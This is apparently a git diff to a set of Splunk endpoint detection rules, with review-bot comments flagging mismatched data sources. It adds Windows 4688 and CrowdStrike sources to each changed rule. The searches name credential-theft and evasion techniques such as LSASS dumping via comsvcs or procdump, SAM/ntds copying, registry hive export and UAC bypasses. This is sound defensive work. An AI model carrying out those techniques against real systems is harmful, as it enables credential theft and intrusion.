+++ b/detections/endpoint/domain_account_discovery_with_dsquery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `dsquery.exe` wi
lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="dsquery.exe"
AND Processes.process = "*user*" by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/domain_account_discovery_with_net_app.yml b/detections/endpoint/domain_account_discovery_with_net_app.yml
index 3fa0097ee5..afcc6c7711 100644
--- a/detections/endpoint/domain_account_discovery_with_net_app.yml
+++ b/detections/endpoint/domain_account_discovery_with_net_app.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `net.exe` or `net1.
potentially leading to further exploitation or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_net` AND Processes.process
= "* user*" AND Processes.process = "*/do*" by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/domain_account_discovery_with_wmic.yml b/detections/endpoint/domain_account_discovery_with_wmic.yml
index 971cb6bfe4..0bc293890b 100644
--- a/detections/endpoint/domain_account_discovery_with_wmic.yml
+++ b/detections/endpoint/domain_account_discovery_with_wmic.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `wmic.exe` with com
facilitating further attacks and potentially compromising sensitive information.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name="wmic.exe"
AND Processes.process = "*/NAMESPACE:\\\\root\\directory\\ldap*" AND Processes.process
diff --git a/detections/endpoint/domain_controller_discovery_with_nltest.yml b/detections/endpoint/domain_controller_discovery_with_nltest.yml
index d93ad4be9e..6a1dd7d0e5 100644
--- a/detections/endpoint/domain_controller_discovery_with_nltest.yml
+++ b/detections/endpoint/domain_controller_discovery_with_nltest.yml
@@ -14,6 +14,8 @@ description: The following analytic detects the execution of `nltest.exe` with c
further attacks such as privilege escalation or lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="nltest.exe")
(Processes.process="*/dclist:*" OR Processes.process="*/dsgetdc:*") by Processes.dest
diff --git a/detections/endpoint/domain_controller_discovery_with_wmic.yml b/detections/endpoint/domain_controller_discovery_with_wmic.yml
index 9fad87c1ad..eb4c6682fc 100644
--- a/detections/endpoint/domain_controller_discovery_with_wmic.yml
+++ b/detections/endpoint/domain_controller_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `wmic.exe` with
to unauthorized access and data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
(Processes.process="" OR Processes.process="*DomainControllerAddress*") by Processes.dest
diff --git a/detections/endpoint/domain_group_discovery_with_dsquery.yml b/detections/endpoint/domain_group_discovery_with_dsquery.yml
index f30afa419a..eb8f5e3edc 100644
--- a/detections/endpoint/domain_group_discovery_with_dsquery.yml
+++ b/detections/endpoint/domain_group_discovery_with_dsquery.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `dsquery.exe` wi
attacks, potentially leading to privilege escalation or data exfiltration.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="dsquery.exe")
(Processes.process="*group*") by Processes.dest Processes.user Processes.parent_process
diff --git a/detections/endpoint/domain_group_discovery_with_net.yml b/detections/endpoint/domain_group_discovery_with_net.yml
index 4707b6fecc..640a60b233 100644
--- a/detections/endpoint/domain_group_discovery_with_net.yml
+++ b/detections/endpoint/domain_group_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `net.exe` with c
such as privilege escalation or lateral movement.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
OR Processes.process_name="net1.exe") (Processes.process=*group* AND Processes.process=*/do*)
diff --git a/detections/endpoint/domain_group_discovery_with_wmic.yml b/detections/endpoint/domain_group_discovery_with_wmic.yml
index 5ee7680ba9..4878ea0088 100644
--- a/detections/endpoint/domain_group_discovery_with_wmic.yml
+++ b/detections/endpoint/domain_group_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies the execution of `wmic.exe` with
within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
(Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap* AND Processes.process=*ds_group*
diff --git a/detections/endpoint/drop_icedid_license_dat.yml b/detections/endpoint/drop_icedid_license_dat.yml
index 67eed26a0a..8414b775e6 100644
--- a/detections/endpoint/drop_icedid_license_dat.yml
+++ b/detections/endpoint/drop_icedid_license_dat.yml
@@ -14,7 +14,7 @@ description: The following analytic detects the dropping of a suspicious file na
confirmed malicious, the attacker could gain unauthorized access to financial data,
leading to significant financial loss and data breaches.
data_source:
-- Sysmon EventID 1
+- Sysmon EventID 11
search: '`sysmon` EventCode= 11 TargetFilename = "*\\license.dat" AND (TargetFilename="*\\appdata\\*"
OR TargetFilename="*\\programdata\\*") |stats count min(_time) as firstTime max(_time)
as lastTime by TargetFilename EventCode process_id process_name dest | `security_content_ctime(firstTime)`
diff --git a/detections/endpoint/dsquery_domain_discovery.yml b/detections/endpoint/dsquery_domain_discovery.yml
index 89ab1635e5..c93cf5eeaf 100644
--- a/detections/endpoint/dsquery_domain_discovery.yml
+++ b/detections/endpoint/dsquery_domain_discovery.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the execution of "dsquery.exe" with
access to trusted domains.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name=dsquery.exe
Processes.process=*trustedDomain* by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/dump_lsass_via_comsvcs_dll.yml b/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
index 99767ac7bb..f74ff6c01a 100644
--- a/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
+++ b/detections/endpoint/dump_lsass_via_comsvcs_dll.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects the behavior of dumping credentials from memory by exploiting the Local Security Authority Subsystem Service (LSASS) using the comsvcs.dll and MiniDump via rundll32. This detection leverages process information from Endpoint Detection and Response (EDR) logs, focusing on specific command-line executions. This activity is significant because it indicates potential credential theft, which can lead to broader system compromise, persistence, lateral movement, and privilege escalation. If confirmed malicious, attackers could gain unauthorized access to sensitive information, leading to data theft, ransomware attacks, or other damaging outcomes.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_rundll32` Processes.process=*comsvcs.dll*
Processes.process=*MiniDump* by Processes.user Processes.parent_process_name Processes.process_name
diff --git a/detections/endpoint/dump_lsass_via_procdump.yml b/detections/endpoint/dump_lsass_via_procdump.yml
index f01ad02d9d..c43a1f303b 100644
--- a/detections/endpoint/dump_lsass_via_procdump.yml
+++ b/detections/endpoint/dump_lsass_via_procdump.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the use of procdump.exe to dump the
compromise of the environment.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_procdump` (Processes.process=*-ma*
OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/elevated_group_discovery_with_net.yml b/detections/endpoint/elevated_group_discovery_with_net.yml
index 87c932dc05..f667778adf 100644
--- a/detections/endpoint/elevated_group_discovery_with_net.yml
+++ b/detections/endpoint/elevated_group_discovery_with_net.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `net.exe` or `net1.
access to sensitive systems and data.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="net.exe"
OR Processes.process_name="net1.exe") (Processes.process="*group*" AND Processes.process="*/do*")
diff --git a/detections/endpoint/elevated_group_discovery_with_wmic.yml b/detections/endpoint/elevated_group_discovery_with_wmic.yml
index a55c1d2588..c13ce10927 100644
--- a/detections/endpoint/elevated_group_discovery_with_wmic.yml
+++ b/detections/endpoint/elevated_group_discovery_with_wmic.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of `wmic.exe` with com
access and control over critical network resources.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where (Processes.process_name="wmic.exe")
(Processes.process=*/NAMESPACE:\\\\root\\directory\\ldap*) (Processes.process="*Domain
diff --git a/detections/endpoint/enable_rdp_in_other_port_number.yml b/detections/endpoint/enable_rdp_in_other_port_number.yml
index ba5dc70525..29c3736edc 100644
--- a/detections/endpoint/enable_rdp_in_other_port_number.yml
+++ b/detections/endpoint/enable_rdp_in_other_port_number.yml
@@ -14,7 +14,7 @@ description: The following analytic detects modifications to the registry that e
to bypass network defenses, gain persistent access, and potentially control the
compromised machine.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal
diff --git a/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml b/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml
index 0243c5f583..d32c39f50f 100644
--- a/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml
+++ b/detections/endpoint/enable_wdigest_uselogoncredential_registry.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a suspicious registry modification t
If confirmed malicious, this could allow an attacker to obtain sensitive credentials,
leading to further compromise and lateral movement within the network.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\*"
diff --git a/detections/endpoint/esentutl_sam_copy.yml b/detections/endpoint/esentutl_sam_copy.yml
index 4153e98ff3..484a90ff0c 100644
--- a/detections/endpoint/esentutl_sam_copy.yml
+++ b/detections/endpoint/esentutl_sam_copy.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `esentutl.exe` to access
network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_esentutl` Processes.process
IN ("*ntds*", "*SAM*") by Processes.dest Processes.user Processes.parent_process_name
diff --git a/detections/endpoint/etw_registry_disabled.yml b/detections/endpoint/etw_registry_disabled.yml
index 39c9f4b5be..1dd5816a6e 100644
--- a/detections/endpoint/etw_registry_disabled.yml
+++ b/detections/endpoint/etw_registry_disabled.yml
@@ -14,7 +14,7 @@ description: The following analytic detects a registry modification that disable
undetected, potentially leading to further compromise and persistent access within
the environment.
data_source:
-- Sysmon EventID 12
+- Sysmon EventID 12
- Sysmon EventID 13
search: '| tstats `security_content_summariesonly` count FROM datamodel=Endpoint.Registry
WHERE (Registry.registry_path="*\\SOFTWARE\\Microsoft\\.NETFramework*" Registry.registry_value_name
diff --git a/detections/endpoint/eventvwr_uac_bypass.yml b/detections/endpoint/eventvwr_uac_bypass.yml
index 76f5b40457..1fa34580aa 100644
--- a/detections/endpoint/eventvwr_uac_bypass.yml
+++ b/detections/endpoint/eventvwr_uac_bypass.yml
@@ -15,6 +15,8 @@ description: The following analytic detects an Eventvwr UAC bypass by identifyin
compromise of the affected system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) AS firstTime max(_time)
AS lastTime FROM datamodel=Endpoint.Processes BY _time span=1h Processes.user Processes.process_id
Processes.process_name Processes.process Processes.process_path Processes.dest Processes.parent_process_name
diff --git a/detections/endpoint/excel_spawning_powershell.yml b/detections/endpoint/excel_spawning_powershell.yml
index a0b87e1141..a3e559a028 100644
--- a/detections/endpoint/excel_spawning_powershell.yml
+++ b/detections/endpoint/excel_spawning_powershell.yml
@@ -15,6 +15,8 @@ description: The following analytic detects Microsoft Excel spawning PowerShell,
privilege escalation, or persistent access within the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.parent_process_name="excel.exe" `process_powershell` by Processes.parent_process
diff --git a/detections/endpoint/excel_spawning_windows_script_host.yml b/detections/endpoint/excel_spawning_windows_script_host.yml
index b0a85217a8..0dbb970645 100644
--- a/detections/endpoint/excel_spawning_windows_script_host.yml
+++ b/detections/endpoint/excel_spawning_windows_script_host.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies instances where Microsoft Excel s
Immediate investigation and mitigation are recommended.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
where Processes.parent_process_name="excel.exe" Processes.process_name IN ("cscript.exe",
diff --git a/detections/endpoint/excessive_attempt_to_disable_services.yml b/detections/endpoint/excessive_attempt_to_disable_services.yml
index f3330cfa40..289c6878be 100644
--- a/detections/endpoint/excessive_attempt_to_disable_services.yml
+++ b/detections/endpoint/excessive_attempt_to_disable_services.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies a suspicious series of command-li
security mechanisms, thereby increasing the risk of further exploitation.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name =
diff --git a/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml b/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml
index 317b1d34b7..0988a0f3b1 100644
--- a/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml
+++ b/detections/endpoint/excessive_distinct_processes_from_windows_temp.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies an excessive number of distinct p
posing a severe threat to system integrity and security.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
distinct_count(Processes.process) as distinct_process_count min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_path
diff --git a/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml b/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml
index 14c3da5d5b..482a141d0d 100644
--- a/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml
+++ b/detections/endpoint/excessive_file_deletion_in_windefender_folder.yml
@@ -12,7 +12,7 @@ description: The following analytic detects excessive file deletion events in th
If confirmed malicious, this activity could allow an attacker to disable endpoint
protection, facilitating further malicious actions without detection.
data_source:
-- Sysmon EventID 23
+- Sysmon EventID 23
- Sysmon EventID 26
search: '`sysmon` EventCode IN ("23","26") TargetFilename = "*\\ProgramData\\Microsoft\\Windows
Defender\\*" | stats count, values(TargetFilename) as deleted_files, min(_time)
diff --git a/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml b/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml
index 08d62164b5..84c8c83e3d 100644
--- a/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml
+++ b/detections/endpoint/excessive_number_of_service_control_start_as_disabled.yml
@@ -15,6 +15,8 @@ description: The following analytic detects an excessive number of `sc.exe` proc
the compromised system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` distinct_count(Processes.process)
as distinct_cmdlines values(Processes.process_id) as process_ids min(_time) as firstTime
max(_time) as lastTime FROM datamodel=Endpoint.Processes WHERE Processes.process_name
diff --git a/detections/endpoint/excessive_number_of_taskhost_processes.yml b/detections/endpoint/excessive_number_of_taskhost_processes.yml
index f8a3260d94..673e2ab90b 100644
--- a/detections/endpoint/excessive_number_of_taskhost_processes.yml
+++ b/detections/endpoint/excessive_number_of_taskhost_processes.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies an excessive number of taskhost.e
privileges, or move laterally within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process_id) as
process_ids min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Processes
WHERE Processes.process_name = "taskhost.exe" OR Processes.process_name = "taskhostex.exe"
diff --git a/detections/endpoint/excessive_service_stop_attempt.yml b/detections/endpoint/excessive_service_stop_attempt.yml
index 1319bf5119..d9f2ccc4cb 100644
--- a/detections/endpoint/excessive_service_stop_attempt.yml
+++ b/detections/endpoint/excessive_service_stop_attempt.yml
@@ -15,6 +15,8 @@ description: The following analytic detects multiple attempts to stop or delete
the system's security posture.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_net` OR Processes.process_name
diff --git a/detections/endpoint/excessive_usage_of_cacls_app.yml b/detections/endpoint/excessive_usage_of_cacls_app.yml
index 343c5eb6a4..c25a3d7d46 100644
--- a/detections/endpoint/excessive_usage_of_cacls_app.yml
+++ b/detections/endpoint/excessive_usage_of_cacls_app.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies excessive usage of `cacls.exe`, `
critical files, aiding in the persistence and concealment of malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id values(Processes.process_name) as process_name
count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes
diff --git a/detections/endpoint/excessive_usage_of_net_app.yml b/detections/endpoint/excessive_usage_of_net_app.yml
index b9557e2e91..3fd324c5c1 100644
--- a/detections/endpoint/excessive_usage_of_net_app.yml
+++ b/detections/endpoint/excessive_usage_of_net_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of `net.exe` or `net
malicious actions.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_net` by Processes.process_name
diff --git a/detections/endpoint/excessive_usage_of_nslookup_app.yml b/detections/endpoint/excessive_usage_of_nslookup_app.yml
index 9d61ab590e..85204a4ab8 100644
--- a/detections/endpoint/excessive_usage_of_nslookup_app.yml
+++ b/detections/endpoint/excessive_usage_of_nslookup_app.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of the nslookup appl
out of the network, bypassing traditional data exfiltration defenses.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '`sysmon` EventCode = 1 process_name = "nslookup.exe" | bucket _time span=1m
| stats count as numNsLookup by dest, _time | eventstats avg(numNsLookup) as avgNsLookup,
stdev(numNsLookup) as stdNsLookup, count as numSlots by dest | eval upperThreshold=(avgNsLookup
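Review bot: The two added data sources do not match the search, which runs directly over `` `sysmon` EventCode = 1 process_name = "nslookup.exe" `` rather than the Endpoint.Processes data model, so neither Security 4688 nor CrowdStrike ProcessRollup2 events can ever reach it. The hunk at L36974 (`excessive_usage_of_sc_service_utility.yml`) has the same mismatch with `` `sysmon` EventCode = 1 process_name = "sc.exe" ``. Either drop the two new entries in both files or rework the searches to use `| tstats `security_content_summariesonly` ... from datamodel=Endpoint.Processes where Processes.process_name="nslookup.exe"`, as the neighbouring detections do; the search body continues past the hunk, so the `bucket`/`eventstats` tail would need the same field rename. As written, the `data_source` list promises coverage the analytic does not provide.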
diff --git a/detections/endpoint/excessive_usage_of_sc_service_utility.yml b/detections/endpoint/excessive_usage_of_sc_service_utility.yml
index 074a2c9698..41194d4c27 100644
--- a/detections/endpoint/excessive_usage_of_sc_service_utility.yml
+++ b/detections/endpoint/excessive_usage_of_sc_service_utility.yml
@@ -15,6 +15,8 @@ description: The following analytic detects excessive usage of the `sc.exe` serv
leading to system compromise or disruption of security defenses.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '`sysmon` EventCode = 1 process_name = "sc.exe" | bucket _time span=15m |
stats values(process) as process count as numScExe by dest, _time | eventstats
avg(numScExe) as avgScExe, stdev(numScExe) as stdScExe, count as numSlots by dest
diff --git a/detections/endpoint/excessive_usage_of_taskkill.yml b/detections/endpoint/excessive_usage_of_taskkill.yml
index 3ba32c264a..448d2a796a 100644
--- a/detections/endpoint/excessive_usage_of_taskkill.yml
+++ b/detections/endpoint/excessive_usage_of_taskkill.yml
@@ -15,6 +15,8 @@ description: The following analytic identifies excessive usage of `taskkill.exe`
the system.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` values(Processes.process) as process
values(Processes.process_id) as process_id count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "taskkill.exe" by
diff --git a/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml b/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml
index 05722b76c7..2d4425be5e 100644
--- a/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml
+++ b/detections/endpoint/execute_javascript_with_jscript_com_clsid.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of JavaScript using th
the environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "cscript.exe"
Processes.process="*-e:{F414C262-6AC0-11CF-B6D1-00AA00BBBB58}*" by Processes.parent_process_name
diff --git a/detections/endpoint/execution_of_file_with_multiple_extensions.yml b/detections/endpoint/execution_of_file_with_multiple_extensions.yml
index e5a8a177a1..2fe73696eb 100644
--- a/detections/endpoint/execution_of_file_with_multiple_extensions.yml
+++ b/detections/endpoint/execution_of_file_with_multiple_extensions.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of files with multiple
allowing further malicious activities.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process IN ("*.doc.exe",
"*.xls.exe","*.ppt.exe", "*.htm.exe", "*.html.exe", "*.txt.exe", "*.pdf.exe", "*.docx.exe",
diff --git a/detections/endpoint/extraction_of_registry_hives.yml b/detections/endpoint/extraction_of_registry_hives.yml
index bcadff399d..9154c3ea89 100644
--- a/detections/endpoint/extraction_of_registry_hives.yml
+++ b/detections/endpoint/extraction_of_registry_hives.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the use of `reg.exe` to export Windo
compromise and lateral movement within the network.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where `process_reg` (Processes.process=*save*
OR Processes.process=*export*) AND (Processes.process="*\sam *" OR Processes.process="*\system
diff --git a/detections/endpoint/file_with_samsam_extension.yml b/detections/endpoint/file_with_samsam_extension.yml
index 8cf0a0e31e..5a80d37e93 100644
--- a/detections/endpoint/file_with_samsam_extension.yml
+++ b/detections/endpoint/file_with_samsam_extension.yml
@@ -9,6 +9,8 @@ description: |-
The following analytic detects file writes with extensions indicative of a SamSam ransomware attack. It leverages file-system activity data to identify file names ending in .stubbin, .berkshire, .satoshi, .sophos, or .keyxml. This activity is significant because SamSam ransomware is highly destructive, leading to file encryption and ransom demands. If confirmed malicious, the impact includes significant financial losses, operational disruptions, and reputational damage. Immediate actions should include isolating affected systems, restoring files from backups, and investigating the attack source to prevent further incidents.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path)
as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)`
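Review bot: This search reads `datamodel=Endpoint.Filesystem` (file writes by `Filesystem.file_name`), so the added process-creation sources `Windows Event Log Security 4688` and `CrowdStrike ProcessRollup2` do not feed it, and the pre-existing `Sysmon EventID 1` entry is wrong for the same reason. The same commit corrects `drop_icedid_license_dat.yml` (hunk at L36688) from Sysmon EventID 1 to 11 for a file-write search; this file should receive the same treatment rather than the process sources, i.e. `data_source:` followed by `- Sysmon EventID 11` only. If a CrowdStrike file-write event type is meant to be supported, it should be named explicitly rather than ProcessRollup2. The search continues beyond the hunk but the data model it uses is fully visible on these lines.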
diff --git a/detections/endpoint/firewall_allowed_program_enable.yml b/detections/endpoint/firewall_allowed_program_enable.yml
index 004add9e5c..fd941db74c 100644
--- a/detections/endpoint/firewall_allowed_program_enable.yml
+++ b/detections/endpoint/firewall_allowed_program_enable.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the modification of a firewall rule
maintain persistence within the target environment.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.process = "*firewall*"
Processes.process = "*allow*" Processes.process = "*add*" Processes.process = "*ENABLE*"
diff --git a/detections/endpoint/first_time_seen_child_process_of_zoom.yml b/detections/endpoint/first_time_seen_child_process_of_zoom.yml
index 1bb6193737..75ddc76ae6 100644
--- a/detections/endpoint/first_time_seen_child_process_of_zoom.yml
+++ b/detections/endpoint/first_time_seen_child_process_of_zoom.yml
@@ -14,6 +14,8 @@ description: The following analytic identifies the first-time execution of child
execution, data exfiltration, or further compromise of the endpoint.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` min(_time) as firstTime values(Processes.parent_process_name)
as parent_process_name values(Processes.parent_process_id) as parent_process_id
values(Processes.process_name) as process_name values(Processes.process) as process
diff --git a/detections/endpoint/fodhelper_uac_bypass.yml b/detections/endpoint/fodhelper_uac_bypass.yml
index 3bf08952f6..036d21325a 100644
--- a/detections/endpoint/fodhelper_uac_bypass.yml
+++ b/detections/endpoint/fodhelper_uac_bypass.yml
@@ -15,6 +15,8 @@ description: 'The following analytic detects the execution of fodhelper.exe, whi
system compromise.'
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time)
as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name=fodhelper.exe
by Processes.dest Processes.user Processes.parent_process Processes.parent_process_name
diff --git a/detections/endpoint/fsutil_zeroing_file.yml b/detections/endpoint/fsutil_zeroing_file.yml
index b50136e550..2258c46943 100644
--- a/detections/endpoint/fsutil_zeroing_file.yml
+++ b/detections/endpoint/fsutil_zeroing_file.yml
@@ -15,6 +15,8 @@ description: The following analytic detects the execution of the 'fsutil' comman
response efforts.
data_source:
- Sysmon EventID 1
+- Windows Event Log Security 4688
+- CrowdStrike ProcessRollup2
search: '| tstats `security_content_summariesonly` count values(Processes.process)
as process values(Processes.parent_process) as parent_process min(_time) as firstTime
max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=fsutil.exe
